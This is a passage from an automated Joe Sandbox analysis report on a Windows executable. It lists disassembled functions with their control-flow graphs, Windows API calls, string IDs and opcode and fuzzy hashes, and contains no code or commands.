                                                                    • Opcode Fuzzy Hash: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                    • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58
                                                                    Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1150 40236f-40238e LoadLibraryA GetProcAddress 1151 402390-40239b GetNativeSystemInfo 1150->1151 1152 40239c-40239f 1150->1152
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                    • String ID: GetNativeSystemInfo$kernel32
                                                                    • API String ID: 2103483237-3846845290
                                                                    • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                    • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                    • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                    • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368
                                                                    Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1361 403387-40339e GetFileAttributesW 1362 4033a0-4033a2 1361->1362 1363 4033a4-4033a6 1361->1363 1364 4033fd-4033ff 1362->1364 1365 4033b5-4033bc 1363->1365 1366 4033a8-4033b3 SetLastError 1363->1366 1367 4033c7-4033ca 1365->1367 1368 4033be-4033c5 call 40335a 1365->1368 1366->1364 1369 4033fa-4033fc 1367->1369 1370 4033cc-4033dd FindFirstFileW 1367->1370 1368->1364 1369->1364 1370->1368 1372 4033df-4033f8 FindClose CompareFileTime 1370->1372 1372->1368 1372->1369
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                    • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 1799206407-0
                                                                    • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                    • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                    • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                    • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                    Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                    • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeMessageSendSpace
                                                                    • String ID:
                                                                    • API String ID: 696007252-0
                                                                    • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                    • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                    • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                    • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D
                                                                    Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 724 403400-403418 call 402823 727 4036a2-4036ae call 4025cd 724->727 730 4036b4-4036be ??3@YAXPAX@Z 727->730 731 40341d-403444 call 401458 * 2 call 402823 727->731 732 4036eb-4036f0 730->732 739 40345a-403466 call 401bbb 731->739 742 403446-403449 739->742 743 403468-40349a call 402ad8 call 4013a9 ??3@YAXPAX@Z * 2 739->743 742->743 744 40344b-403457 call 40292b 742->744 751 4036c0-4036c6 743->751 752 4034a0-4034af call 4025cd 743->752 744->739 754 4036ce-4036e9 call 402d30 call 40269a ??3@YAXPAX@Z 751->754 757 4034b5-4034be 752->757 758 4036c8-4036cb 752->758 754->732 757->758 760 4034c4-4034d1 call 4025cd 757->760 758->754 760->758 765 4034d7-4034e1 760->765 766 403501-403515 765->766 767 4034e3-4034e5 765->767 769 403593-4035a6 strncmp 766->769 767->758 768 4034eb-4034fc call 402662 767->768 778 40369a-40369d call 40269a 768->778 770 4035a8 769->770 771 40357e-403591 strncmp 769->771 774 4035cd-4035d4 770->774 771->769 773 403517-40351a 771->773 773->758 779 403520-40352f 773->779 776 4035d6-4035dc 774->776 777 4035aa-4035ad 774->777 780 4035e2-40360c call 402ad8 call 4013a9 ??3@YAXPAX@Z call 402dd6 776->780 784 4035de-4035df 776->784 777->776 783 4035af-4035b2 777->783 778->727 779->780 781 403535-403538 779->781 807 403611-403623 lstrcmpW 780->807 785 403573 781->785 786 40353a-403546 781->786 787 4035b4-4035b9 783->787 788 4035bc-4035c8 call 40292b 783->788 784->780 794 403576 785->794 790 403548-40354a 786->790 791 40356f-403571 786->791 787->788 792 4035bb 787->792 788->774 796 40356b-40356d 790->796 797 40354c-40354e 790->797 791->794 792->788 798 403579 call 40292b 794->798 796->794 801 403550-403555 797->801 802 403567-403569 797->802 798->771 805 403563-403565 801->805 806 403557-403561 call 40292b 801->806 802->794 805->798 806->794 809 403625-403633 call 40cc87 807->809 810 403639-403646 807->810 809->758 809->810 813 403648-403661 lstrlenW wcsncmp 810->813 814 40366e-40367f call 40261a 810->814 816 403663-403668 813->816 817 40366a-40366c 813->817 819 40368e-403695 call 4032d9 814->819 822 403681-40368c call 401370 814->822 816->813 816->817 817->814 817->819 819->778 822->778
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: 0VA$SetEnvironment${\rtf
                                                                    • API String ID: 613200358-2390373888
                                                                    • Opcode ID: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                    • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                    • Opcode Fuzzy Hash: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                    • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                                    Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 931 404f67-404fac call 401458 * 2 memset 936 404fb8-404fbc 931->936 937 404fae-404fb1 931->937 938 404fc5-404fdf call 404a97 call 401370 936->938 939 404fbe 936->939 937->936 944 404fe1-404fe9 ??3@YAXPAX@Z 938->944 945 404ffa-405012 ShellExecuteExW 938->945 939->938 946 404fec-404ff9 ??3@YAXPAX@Z 944->946 947 405014-40501b 945->947 948 40503a-40503c 945->948 949 405028-40502b CloseHandle 947->949 950 40501d-405022 WaitForSingleObject 947->950 951 405031-405038 ??3@YAXPAX@Z 948->951 949->951 950->949 951->946
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404F8B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                    • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                    • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                    • String ID: $gA
                                                                    • API String ID: 2700081640-3949116232
                                                                    • Opcode ID: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                    • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                    • Opcode Fuzzy Hash: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                    • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58
                                                                    Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                    • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                    • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                    • DispatchMessageW.USER32(?), ref: 00401D73
                                                                    • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                    • String ID: Static
                                                                    • API String ID: 2479445380-2272013587
                                                                    • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                    • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                    • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                    • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9
                                                                    Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 955 4036f1-403717 lstrlenW call 402771 958 403722-40372e 955->958 959 403719-40371d call 401172 955->959 961 403730-403734 958->961 962 403736-40373c 958->962 959->958 961->962 963 40373f-403741 961->963 962->963 964 403765-40376e call 401b75 963->964 967 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 964->967 968 403754-403756 964->968 971 403785-403793 call 403387 967->971 972 40379c-4037a5 call 401b75 967->972 969 403743-40374b 968->969 970 403758-40375a 968->970 969->970 977 40374d-403751 969->977 973 403760 970->973 974 403814-40381a 970->974 971->972 985 403795-403797 971->985 986 4037b6-4037b8 972->986 987 4037a7-4037b4 call 408dbf 972->987 973->964 981 403844-403857 call 408dbf ??3@YAXPAX@Z 974->981 982 40381c-403827 974->982 977->970 978 403753 977->978 978->968 998 403859-40385d 981->998 982->981 983 403829-40382d 982->983 983->981 989 40382f-403834 983->989 993 403839-403842 ??3@YAXPAX@Z 985->993 990 403808-403812 ??3@YAXPAX@Z 986->990 991 4037ba-4037d9 memcpy 986->991 987->985 989->981 995 403836-403838 989->995 990->998 996 4037db 991->996 997 4037ee-4037f2 991->997 993->998 995->993 999 4037ed 996->999 1000 4037f4-403801 call 401b75 997->1000 1001 4037dd-4037e5 997->1001 999->997 1000->987 1005 403803-403806 1000->1005 1001->1000 1002 4037e7-4037eb 1001->1002 1002->999 1002->1000 1005->990 1005->991
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                    • String ID:
                                                                    • API String ID: 846840743-0
                                                                    • Opcode ID: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                    • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                    • Opcode Fuzzy Hash: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                    • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD
                                                                    Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1006 40f227-40f26f _EH_prolog call 40ef4a 1009 40f271-40f274 1006->1009 1010 40f277-40f27a 1006->1010 1009->1010 1011 40f290-40f2b5 1010->1011 1012 40f27c-40f281 1010->1012 1015 40f2b7-40f2bd 1011->1015 1013 40f283-40f285 1012->1013 1014 40f289-40f28b 1012->1014 1013->1014 1016 40f6f3-40f704 1014->1016 1017 40f2c3-40f2c7 1015->1017 1018 40f387-40f39a call 4011d1 1015->1018 1019 40f2c9-40f2cc 1017->1019 1020 40f2cf-40f2de 1017->1020 1026 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 1018->1026 1027 40f39c-40f3a6 call 40ef85 1018->1027 1019->1020 1022 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 1020->1022 1023 40f303-40f308 1020->1023 1043 40f2fb-40f301 1022->1043 1024 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 1023->1024 1025 40f30a-40f314 1023->1025 1029 40f353-40f369 1024->1029 1025->1024 1025->1029 1040 40f3e1-40f3fa call 40ef4a call 40dc14 1026->1040 1041 40f3d8-40f3df call 40dce7 1026->1041 1049 40f3aa-40f3ac 1027->1049 1037 40f36c-40f374 1029->1037 1042 40f376-40f385 call 40ef63 1037->1042 1037->1043 1059 40f3fd-40f420 call 40dc09 1040->1059 1041->1040 1042->1037 1043->1015 1049->1016 1063 40f422-40f427 1059->1063 1064 40f456-40f459 1059->1064 1067 40f429-40f42b 1063->1067 1068 40f42f-40f447 call 40f090 call 40ef85 1063->1068 1065 40f485-40f4a9 ??2@YAPAXI@Z 1064->1065 1066 40f45b-40f460 1064->1066 1072 40f4b4 1065->1072 1073 40f4ab-40f4b2 call 40f776 1065->1073 1069 40f462-40f464 1066->1069 1070 40f468-40f47e call 40f090 call 40ef85 1066->1070 1067->1068 1085 40f449-40f44b 1068->1085 1086 40f44f-40f451 1068->1086 1069->1070 1070->1065 1074 40f4b6-40f4cd call 40ef4a 1072->1074 1073->1074 1087 40f4db-40f500 call 40faff 1074->1087 1088 40f4cf-40f4d8 1074->1088 1085->1086 1086->1016 1092 40f502-40f507 1087->1092 1093 40f543-40f546 1087->1093 1088->1087 1096 40f509-40f50b 1092->1096 1097 40f50f-40f514 1092->1097 1094 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 1093->1094 1095 40f6ae-40f6b3 1093->1095 1113 40f5ae-40f5b3 1094->1113 1098 40f6b5-40f6b6 1095->1098 1099 40f6bb-40f6df 1095->1099 1096->1097 1101 40f516-40f518 1097->1101 1102 40f51c-40f534 call 40f090 call 40ef85 1097->1102 1098->1099 1099->1016 1099->1059 1101->1102 1111 40f536-40f538 1102->1111 1112 40f53c-40f53e 1102->1112 1111->1112 1112->1016 1114 40f615-40f61b 1113->1114 1115 40f5b5 1113->1115 1117 40f621-40f623 1114->1117 1118 40f61d-40f61f 1114->1118 1116 40f5b7 1115->1116 1119 40f5ba-40f5c3 call 40faac 1116->1119 1120 40f5c5-40f5c7 1117->1120 1121 40f625-40f631 1117->1121 1118->1116 1119->1120 1131 40f602-40f604 1119->1131 1123 40f5c9-40f5ca 1120->1123 1124 40f5cf-40f5d1 1120->1124 1125 40f633-40f635 1121->1125 1126 40f637-40f63d 1121->1126 1123->1124 1128 40f5d3-40f5d5 1124->1128 1129 40f5d9-40f5f1 call 40f090 call 40ef85 1124->1129 1125->1119 1126->1099 1130 40f63f-40f645 1126->1130 1128->1129 1129->1049 1139 40f5f7-40f5fd 1129->1139 1130->1099 1133 40f606-40f608 1131->1133 1134 40f60c-40f610 1131->1134 1133->1134 1134->1099 1139->1049
                                                                    APIs
                                                                    • _EH_prolog.MSVCRT ref: 0040F230
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                      • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$H_prolog
                                                                    • String ID: pmA${D@
                                                                    • API String ID: 3431946709-901781089
                                                                    • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                    • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                    • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                    • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54
                                                                    Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1142 401b75-401b84 CreateDirectoryW 1143 401bb6-401bba 1142->1143 1144 401b86-401b93 GetLastError 1142->1144 1145 401ba0-401bad GetFileAttributesW 1144->1145 1146 401b95 1144->1146 1145->1143 1148 401baf-401bb1 1145->1148 1147 401b96-401b9f SetLastError 1146->1147 1148->1143 1149 401bb3-401bb4 1148->1149 1149->1147
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                    • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                    • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                    • String ID: k7@
                                                                    • API String ID: 635176117-1561861239
                                                                    • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                    • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                    • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                    • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549
                                                                    Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
